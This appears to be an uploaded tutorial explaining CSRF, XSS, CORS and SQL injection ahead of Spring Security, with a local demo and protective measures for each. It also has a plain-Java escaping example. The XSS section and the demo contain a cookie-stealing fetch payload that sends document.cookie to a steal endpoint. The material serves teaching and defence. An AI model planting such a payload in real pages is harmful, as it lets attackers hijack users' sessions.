SpringBoot - Attacks

The document discusses common web security attacks including CSRF, XSS, and CORS, explaining how they work and their implications. It provides examples of how these attacks can be executed and suggests protective measures such as using CSRF tokens, escaping user input, and implementing CORS headers. Additionally, it highlights the importance of parameterized queries to prevent SQL injection attacks.

Uploaded by yuvraj
Before we start Spring Security, let's understand some common attacks.

1. CSRF (Cross-Site Request Forgery)
+ The user is already authenticated to a site.
+ A CSRF attack tricks the browser into making an unwanted request to a site where the user is already authenticated.
+ Applicable where state and session are managed.

In the demo below, I made authentication mandatory for all endpoints but also used session (stateful) based authentication.

Step 1: make the user authenticated on the server.
[Screenshot: the application's "Please sign in" login page]

Step 2: send some malicious link to this user, who is authenticated.
[Screenshot: attacker page reading "Click Below to Claim Your Reward!" with a "claim my Money" button]

As soon as the user clicks the "claim my Money" button, an unwanted operation is executed, and the browser appends the session cookies too.

How to get protected from CSRF attack:
- By using a CSRF token, which ensures that the request originates from a legitimate source. Only authenticated forms or the website itself append the CSRF token to the request, which the server can validate against the token created at the time of HTTP session creation.

2. XSS (Cross-Site Scripting)
+ It allows an attacker to put a malicious script into a web page viewed by other users.
+ Like a comments section page.
+ Commonly used for stealing the session or defacing the website.

For demo purposes, I am creating:
+ GET "/xss" endpoint, which loads all the comments. It returns "xss"; since it's a @Controller class (not @RestController), by default it will look for an "xss.html" file and try to render it.
+ POST "/comment" endpoint, which does not sanitize any user input and simply stores this comment, say in a DB, and then displays it during the GET call. So, if an attacker puts a malicious script using this POST request, then during every GET call this script will run for all the users who make the call.

[Screenshot: browser at localhost:8080/xss showing the "Leave a Comment" form]

Now, if I insert a comment containing a `<script>` tag and click submit, this script gets stored in the DB, and when the GET API is invoked it fetches this malicious comment from the DB, returns it in the response, and the browser executes it.

Now assume what happens if I added:

fetch('http://localhost:8080/steal?cookie=' + document.cookie);

Then whenever any user loads this comment section page, that user's cookie will be sent to the attacker's URL. This cookie only holds the JSESSIONID, which the attacker can use to perform unwanted operations on that user's active session.

How to get protected from XSS attack:
- By properly escaping user input (converting special characters like < to &lt;).
- By properly validating data before rendering.

3. CORS (Cross-Origin Resource Sharing)
+ It's not an attack but more of a security feature that restricts web pages from making requests to a different origin, unless allowed by the server.

Different origin = protocol + domain + port

For example:
Client: https://localhost:8080
Server: http://localhost:8080

Different protocol, so it's considered a different origin, and by default if the client tries to call the server, CORS will block this. The SERVER has to allow the request from "https://localhost:8080".

Similarly, a different port (client https://localhost:4090 calling server https://localhost:8080) or a different domain is a different origin.

So, whenever there is a call between different origins, the server has to allow it:
+ By setting the "Access-Control-Allow-Origin" and other headers to allow the cross-origin request.

4. SQL Injection
+ In this attack, the attacker manipulates the SQL query by inserting malicious input into the user field.

How to get protected from SQL Injection attack:
- By parameterized query.
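The output escaping recommended in the XSS section above, as an added example in plain Java (not code from the original slides, and with no Spring dependency): a stand-in for the POST "/comment" and GET "/xss" endpoints that renders the stored comments unescaped beside the escaped form. The in-memory list standing in for the DB and the class name CommentXssDemo are assumptions.

```java
import java.util.ArrayList;
import java.util.List;

// Stand-in for the slides' demo: no Spring, an in-memory list instead of the DB (assumption).
public class CommentXssDemo {
    private final List<String> comments = new ArrayList<>();

    // Mirrors the vulnerable POST /comment: the raw input is stored unchanged.
    public void postComment(String body) {
        comments.add(body);
    }

    // Vulnerable GET /xss rendering: comments are concatenated straight into the HTML,
    // so a <script> stored by one user runs in every visitor's browser.
    public String renderUnsafe() {
        StringBuilder html = new StringBuilder("<ul>\n");
        for (String c : comments) html.append("  <li>").append(c).append("</li>\n");
        return html.append("</ul>").toString();
    }

    // Hardened rendering: every comment is HTML-escaped at output time.
    public String renderEscaped() {
        StringBuilder html = new StringBuilder("<ul>\n");
        for (String c : comments) html.append("  <li>").append(escapeHtml(c)).append("</li>\n");
        return html.append("</ul>").toString();
    }

    // Escaping for an HTML text context: characters that can change HTML structure
    // (or break out of a quoted attribute) become entities, e.g. < becomes &lt;.
    public static String escapeHtml(String s) {
        StringBuilder out = new StringBuilder(s.length());
        for (char ch : s.toCharArray()) {
            switch (ch) {
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '&':  out.append("&amp;");  break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#x27;"); break;
                default:   out.append(ch);
            }
        }
        return out.toString();
    }

    public static void main(String[] args) {
        CommentXssDemo demo = new CommentXssDemo();
        demo.postComment("Nice post!");
        // Constructed input: the cookie-stealing comment from the slides, wrapped in a script tag.
        demo.postComment("<script>fetch('http://localhost:8080/steal?cookie=' + document.cookie);</script>");
        System.out.println("Unsafe render:\n" + demo.renderUnsafe());
        System.out.println("Escaped render:\n" + demo.renderEscaped());
        // false: the escaped page contains no <script element, so the browser only shows text.
        System.out.println("Escaped output still contains <script: " + demo.renderEscaped().contains("<script"));
    }
}
```

Run it with `java CommentXssDemo.java` (JDK 11 or later); the escaped render shows the payload as visible text instead of executing it.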
